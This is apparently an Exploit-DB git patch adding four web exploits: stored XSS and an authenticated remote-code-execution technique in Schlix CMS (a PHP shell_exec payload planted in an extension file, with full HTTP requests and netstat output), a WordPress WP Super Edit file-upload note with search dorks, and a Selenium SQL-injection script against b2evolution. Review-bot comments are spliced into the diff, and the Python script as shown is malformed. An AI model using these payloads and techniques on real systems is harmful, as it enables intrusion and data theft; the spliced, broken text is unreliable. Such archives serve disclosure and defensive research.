From 72135d9121d84ec5890794bcdcc3ffa8429b2927 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 May 2021 05:02:58 +0000 Subject: [PATCH] DB: 2021-05-07 4 changes to exploits/shellcodes Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload b2evolution 7-2-2 - 'cf_name' SQL Injection --- exploits/multiple/webapps/49837.txt | 182 +++++++++++++++++ exploits/multiple/webapps/49838.txt | 295 ++++++++++++++++++++++++++++ exploits/php/webapps/49839.txt | 27 +++ exploits/php/webapps/49840.py | 83 ++++++++ files_exploits.csv | 4 + 5 files changed, 591 insertions(+) create mode 100644 exploits/multiple/webapps/49837.txt create mode 100644 exploits/multiple/webapps/49838.txt create mode 100644 exploits/php/webapps/49839.txt create mode 100755 exploits/php/webapps/49840.py diff --git a/exploits/multiple/webapps/49837.txt b/exploits/multiple/webapps/49837.txt new file mode 100644 index 000000000..e293ad1b6 --- /dev/null +++ b/exploits/multiple/webapps/49837.txt @@ -0,0 +1,182 @@ +# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) +# Date: 2021-05-05 +# Exploit Author: Emircan Baş +# Vendor Homepage: https://www.schlix.com/ +# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip +# Version: 2.2.6-6 +# Tested on: Windows & WampServer + +==> Tutorial <== + +1- Login with your account. +2- Go to the contacts section. Directory is '/admin/app/contact'. +3- Create a new category and type an XSS payload into the category title. +4- XSS payload will be executed when we travel to created page. + +==> Vulnerable Source Code <== + +
+
+
+
+
+
+

'">

# OUR PAYLOAD IS NON-EXECUTEABLE +
+
+
+
+
+ + +==> HTTP Request <== + +POST /admin/app/contacts?action=savecategory HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489 +Content-Length: 4146 +Origin: (ORIGIN) +Connection: close +Referer: (REFERER) +Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 +Upgrade-Insecure-Requests: 1 + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="_csrftoken" + +49feefcd2b917b9855cd55c8bd174235fa5912e4 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="cid" + +6 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="parent_id" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="guid" + +ee34f23a-7167-a454-8576-20bef7575c15 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="title" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="status" + +1 +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="virtual_filename" + +script-alert-1-script +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="summary" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="description" + + 
+-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="meta_description" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="meta_key" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="tags" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="date_available" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="date_expiry" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="items_per_page" + + +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +display_pagetitle +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +__null__ +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +display_child_categories +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +__null__ +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +display_items +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[]" + +__null__ +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[child_categories_sortby]" + +date_created +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="options[items_sortby]" + +date_created +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; name="permission_read_everyone" + +everyone +-----------------------------280033592236615772622294478489 +Content-Disposition: form-data; 
name="permission_read[]"
+
+1
+-----------------------------280033592236615772622294478489
+Content-Disposition: form-data; name="permission_read[]"
+
+2
+-----------------------------280033592236615772622294478489
+Content-Disposition: form-data; name="permission_read[]"
+
+3
+-----------------------------280033592236615772622294478489
+Content-Disposition: form-data; name="permission_write[]"
+
+1
+-----------------------------280033592236615772622294478489
+Content-Disposition: form-data; name="cmh_media_selection"
+
+
+-----------------------------280033592236615772622294478489
+Content-Disposition: form-data; name="cmh_media_upload"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------280033592236615772622294478489
+Content-Disposition: form-data; name="cmh_media_path"
+
+
+-----------------------------280033592236615772622294478489
+Content-Disposition: form-data; name="cmh_media_url"
+
+
+-----------------------------280033592236615772622294478489--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49838.txt b/exploits/multiple/webapps/49838.txt
new file mode 100644
index 000000000..cb06fcdb3
--- /dev/null
+++ b/exploits/multiple/webapps/49838.txt
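Review bot: The author recorded for this entry is inconsistent: the file header says `# Exploit Author: Emircan Baş` while the files_exploits.csv row added in the same commit credits "Enes Özeser"; one of the two needs correcting before the index is published. The captured request also keeps what look like live session identifiers (the `scx2f1afdb4b86ade4919555d446d2f0909` and `gusrinstall` cookie values and the `_csrftoken` body field) next to already-redacted `(HOST)`/`(ORIGIN)`/`(REFERER)` placeholders; they carry no information for a reader and should be placeholders too. The "Vulnerable Source Code" section and the `title` form field rely on raw HTML that does not survive plain-text rendering (as seen here), so the write-up would be more useful if it named the output location where the category title is echoed unescaped in prose as well — presumably a template, which is not stated on the page.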
@@ -0,0 +1,295 @@ +# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) +# Date: 2021-05-06 +# Exploit Author: Eren Saraç +# Vendor Homepage: https://www.schlix.com/ +# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip +# Version: 2.2.6-6 +# Tested on: Windows & WampServer + +==> Tutorial <== + +1- Login with your account. +2- Go to the block management section. Directory is '/admin/app/core.blockmanager'. +3- Create a new category. +4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp +5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory. +6- Paste this PHP code below and save it. +##################################### +$command = shell_exec('netstat -an'); +echo "
$command
"; + +?> +##################################### + +7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'. +8- Install a package to created category and enter the installed 'mailchimp' extension. +9- Click the 'About' tab and our php code will be executed. + +==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <== + +$command"; + +?> + +==> HTTP Request (ZIP Extension Installation) <== + +POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +X-Schlix-Ajax: 1 +Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130 +Content-Length: 51585 +Origin: http(s)://(ORIGIN) +Connection: close +Referer: http(s)://(REFERER)/admin/app/core.blockmanager +Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; +schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 + +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="_csrftoken" + +a3b9a0da8d6be08513f60d1744e2642df0702ff7 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip" +Content-Type: application/x-zip-compressed + +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# +############################################# 
+############################################# + +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +2097152 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="zipfileupload__total_file_size" + +0 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="zipfileupload__max_file_count" + +20 +-----------------------------29322337091578227221515354130 +Content-Disposition: form-data; name="password" + +# Your ACC Password. +-----------------------------29322337091578227221515354130-- + + +==> HTTP Request (RCE - About Tab) <== + +GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1 +Host: (HOST) +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http(s)://(HOST)/ +Connection: close +Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; +schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 +Upgrade-Insecure-Requests: 1 + + +==> HTTP Response (RCE - About Tab) <== + +HTTP/1.1 200 OK +Date: Wed, 05 May 2021 21:49:24 GMT +Server: Apache/2.4.46 (Win64) PHP/7.3.21 +X-Powered-By: PHP/7.3.21 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 49575 + + + + +
+
+Active Connections
+
+  Proto  Local Address          Foreign Address        State
+  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:912            0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:3307           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING
+  TCP    0.0.0.0:50296          0.0.0.0:0              LISTENING
+  TCP    127.0.0.1:80           127.0.0.1:58843        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58853        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58854        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58859        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58860        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58865        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58868        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58883        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58893        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58894        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58899        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58902        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58908        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58918        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58919        TIME_WAIT
+  TCP    127.0.0.1:80           127.0.0.1:58924        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58886        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58887        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58888        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58891        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58905        CLOSE_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58907        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58911        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58913        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58915        TIME_WAIT
+  TCP    127.0.0.1:8080         127.0.0.1:58916        TIME_WAIT
+  TCP    127.0.0.1:58424        127.0.0.1:58425        ESTABLISHED
+  TCP    127.0.0.1:58425        127.0.0.1:58424        ESTABLISHED
+  TCP    127.0.0.1:58435        127.0.0.1:58436        ESTABLISHED
+  TCP    127.0.0.1:58436        127.0.0.1:58435        ESTABLISHED
+  TCP    127.0.0.1:58565        127.0.0.1:58566        ESTABLISHED
+  TCP    127.0.0.1:58566        127.0.0.1:58565        ESTABLISHED
+  TCP    127.0.0.1:58639        127.0.0.1:58640        ESTABLISHED
+  TCP    127.0.0.1:58640        127.0.0.1:58639        ESTABLISHED
+  TCP    169.254.22.167:139     0.0.0.0:0              LISTENING
+  TCP    169.254.224.26:139     0.0.0.0:0              LISTENING
+  TCP    192.168.1.8:139        0.0.0.0:0              LISTENING
+  TCP    192.168.1.8:49500      95.101.14.77:443       ESTABLISHED
+  TCP    192.168.1.8:57059      162.159.129.235:443    ESTABLISHED
+  TCP    192.168.1.8:57902      162.159.138.234:443    ESTABLISHED
+  TCP    192.168.1.8:58453      44.235.189.138:443     ESTABLISHED
+  TCP    192.168.1.8:58626      162.159.138.232:443    ESTABLISHED
+  TCP    192.168.1.8:58627      162.159.133.234:443    ESTABLISHED
+  TCP    192.168.1.8:58699      162.159.135.232:443    ESTABLISHED
+  TCP    192.168.1.8:58841      20.44.232.74:443       ESTABLISHED
+  TCP    192.168.1.8:58942      162.159.138.232:443    ESTABLISHED
+  TCP    192.168.1.8:58951      138.68.92.190:443      ESTABLISHED
+  TCP    192.168.1.8:60549      51.103.5.159:443       ESTABLISHED
+  TCP    192.168.1.8:60610      104.66.70.197:443      ESTABLISHED
+  TCP    192.168.1.8:60611      104.66.70.197:443      ESTABLISHED
+  TCP    192.168.1.8:60612      217.31.233.104:443     CLOSE_WAIT
+  TCP    [::]:80                [::]:0                 LISTENING
+  TCP    [::]:135               [::]:0                 LISTENING
+  TCP    [::]:445               [::]:0                 LISTENING
+  TCP    [::]:3306              [::]:0                 LISTENING
+  TCP    [::]:3307              [::]:0                 LISTENING
+  TCP    [::]:7680              [::]:0                 LISTENING
+  TCP    [::]:49664             [::]:0                 LISTENING
+  TCP    [::]:49665             [::]:0                 LISTENING
+  TCP    [::]:49666             [::]:0                 LISTENING
+  TCP    [::]:49667             [::]:0                 LISTENING
+  TCP    [::]:49668             [::]:0                 LISTENING
+  TCP    [::]:50296             [::]:0                 LISTENING
+  TCP    [::1]:3306             [::1]:58845            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58856            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58857            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58858            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58932            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58935            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58940            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58950            TIME_WAIT
+  TCP    [::1]:3306             [::1]:58953            ESTABLISHED
+  TCP    [::1]:3306             [::1]:58954            ESTABLISHED
+  TCP    [::1]:49485            [::1]:49486            ESTABLISHED
+  TCP    [::1]:49486            [::1]:49485            ESTABLISHED
+  TCP    [::1]:49669            [::]:0                 LISTENING
+  TCP    [::1]:58844            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58845            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58855            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58856            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58857            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58858            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58861            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58862            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58863            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58864            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58866            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58867            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58869            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58870            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58884            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58885            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58929            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58930            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58931            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58932            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58934            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58935            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58939            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58940            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58946            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58947            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58949            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58950            [::1]:3306             TIME_WAIT
+  TCP    [::1]:58953            [::1]:3306             ESTABLISHED
+  TCP    [::1]:58954            [::1]:3306             ESTABLISHED
+  UDP    0.0.0.0:5050           *:*                    
+  UDP    0.0.0.0:5353           *:*                    
+  UDP    0.0.0.0:5355           *:*                    
+  UDP    0.0.0.0:53240          *:*                    
+  UDP    0.0.0.0:53241          *:*                    
+  UDP    127.0.0.1:1900         *:*                    
+  UDP    127.0.0.1:62353        *:*                    
+  UDP    127.0.0.1:63129        *:*                    
+  UDP    192.168.1.8:137        *:*                    
+  UDP    192.168.1.8:138        *:*                    
+  UDP    192.168.1.8:1900       *:*                    
+  UDP    192.168.1.8:2177       *:*                    
+  UDP    192.168.1.8:63128      *:*                    
+  UDP    [::]:5353              *:*                    
+  UDP    [::]:5355              *:*                    
+  UDP    [::1]:1900             *:*                    
+  UDP    [::1]:63125            *:*                                
+  UDP    [fe80::e4d5:62f5:da3:2dae%21]:1900  *:*                    
+  UDP    [fe80::e4d5:62f5:da3:2dae%21]:2177  *:*                    
+  UDP    [fe80::e4d5:62f5:da3:2dae%21]:63124  *:*                    
+
+
+
+
+
+

mailchimp

+

v1.0

Author: Alip

+

Web: https://github.com/calip/app_mailchimp

+

Uninstall

+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49839.txt b/exploits/php/webapps/49839.txt
new file mode 100644
index 000000000..ed9603201
--- /dev/null
+++ b/exploits/php/webapps/49839.txt
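Review bot: The pasted "HTTP Response (RCE - About Tab)" reproduces roughly 150 rows of `netstat -an` output from the author's own workstation (LAN addresses, listening services, established outbound connections to public hosts) that add nothing to the finding; trimming it to the header and a couple of rows keeps the evidence without publishing the author's network state. As in 49837.txt, the session cookie and `_csrftoken` values are left in while `(HOST)` is redacted, and the `Set-Cookie` line in the response does the same. The write-up should also state the minimum privilege required: the steps go through `/admin/app/core.blockmanager` and install a ZIP package, which presumably needs an administrator with extension-install rights, so for defenders the relevant control is restricting who may install packages and validating package contents, not only a code-level fix — worth saying explicitly since the title only says "Authenticated".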
@@ -0,0 +1,27 @@
+# Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
+# Author: h4shur
+# date: 2021-05-06
+# Vendor Homepage: https://wordpress.org
+# Software Link: https://wordpress.org/plugins/wp-super-edit/
+# Version : 2.5.4 and earlier
+# Tested on: Windows 10 & Google Chrome
+# Category : Web Application Bugs
+# Dork :
+# inurl:"wp-content/plugins/wp-super-edit/superedit/"
+# inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/"
+
+
+### Note:
+
+# 1. Technical Description:
+This plugin allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
+
+# 2. Technical Description:
+WordPress Plugin "wp-super-edit" allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. This vulnerability is caused by FCKeditor in this plugin. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
+
+### POC:
+
+* Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html
+* Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html
+* Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html
+* Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
\ No newline at end of file
diff --git a/exploits/php/webapps/49840.py b/exploits/php/webapps/49840.py
new file mode 100755
index 000000000..67f5c96fc
--- /dev/null
+++ b/exploits/php/webapps/49840.py
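Review bot: The two "Technical Description" paragraphs are near-verbatim copies of each other (the second only adds the plugin name and the sentence attributing the issue to the bundled FCKeditor), so one should be dropped or the first reduced to a one-line summary. The POC section lists four paths into the bundled FCKeditor file manager but contains no request or response showing an upload being accepted, so the "Remote File Upload" claim is asserted rather than demonstrated; a single captured request with the server's response (host and any session values redacted) would substantiate it. For defenders it would help to state plainly that the exposure appears to be the presence of the legacy FCKeditor file-manager pages under the plugin directory, so removing or access-restricting that directory is the practical mitigation — this is inferred from the listed paths, not stated in the file.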
@@ -0,0 +1,83 @@
+# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection
+# Author: @nu11secur1ty
+# Testing and Debugging: @nu11secur1ty
+# Date: 05.06.2021
+# Vendor: https://b2evolution.net/
+# Link: https://b2evolution.net/downloads/7-2-2
+# CVE: CVE-2021-28242
+# Proof: https://streamable.com/x51kso
+
+[+] Exploit Source:
+
+#!/usr/bin/python3
+# Author: @nu11secur1ty
+# CVE-2021-28242
+
+
+from selenium import webdriver
+import time
+
+
+# Vendor: https://typo3.org/
+website_link="
+http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link"
+
+# enter your login username
+username="admin"
+
+# enter your login password
+password="FvsDq7fmHvWF"
+
+#enter the element for username input field
+element_for_username="x"
+
+#enter the element for password input field
+element_for_password="q"
+
+#enter the element for submit button
+element_for_submit="login_action[login]"
+
+
+browser = webdriver.Chrome() #uncomment this line,for chrome users
+#browser = webdriver.Safari() #for macOS users[for others use chrome vis
+chromedriver]
+#browser = webdriver.Firefox() #uncomment this line,for chrome users
+
+browser.get((website_link))
+
+try:
+username_element = browser.find_element_by_name(element_for_username)
+username_element.send_keys(username)
+password_element = browser.find_element_by_name(element_for_password)
+password_element.send_keys(password)
+signInButton = browser.find_element_by_name(element_for_submit)
+signInButton.click()
+
+# Exploit vulnerability MySQL obtain sensitive database information by
+injecting SQL commands into the "cf_name" parameter
+time.sleep(7)
+# Receaving sensitive info for evo_users
+browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
+
+time.sleep(7)
+# Receaving sensitive info for evo_blogs
+browser.get(("
+http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
+
+time.sleep(7)
+# Receaving sensitive info for evo_section
+browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
+
+
+time.sleep(7)
+browser.close()
+
+
+print("At the time, of the exploit, you had to see information about the
+tables...\n")
+
+
+
+except Exception:
+#### This exception occurs if the element are not found in the webpage.
+print("Sorry, your exploit is not working for some reasons...")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8cd37617a..99bf55fb5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44003,3 +44003,7 @@ id,file,description,date,author,type,platform,port
 49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
 49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
 49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
+49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Enes Özeser",webapps,multiple,
+49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple,
+49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php,
+49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php,
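Review bot: The comment `# Vendor: https://typo3.org/` directly above `website_link` contradicts the file header's `# Vendor: https://b2evolution.net/` and looks like a leftover from a different script; it should read `# Vendor: https://b2evolution.net/`. The script also commits the author's lab values as literals — `username="admin"`, `password="FvsDq7fmHvWF"` and the `192.168.1.3` host repeated in four URLs — where the other files in this commit use `(HOST)`-style placeholders; a committed password string is exactly the kind of value that should be a clearly marked placeholder instead. As committed, `website_link="` and the second `browser.get(("` string are broken across two lines and the `try:`/`except Exception:` bodies sit at column 0, so the file is not valid Python; if that is the stored content rather than an artifact of this page, the index entry should flag it as a non-runnable PoC rather than a working script.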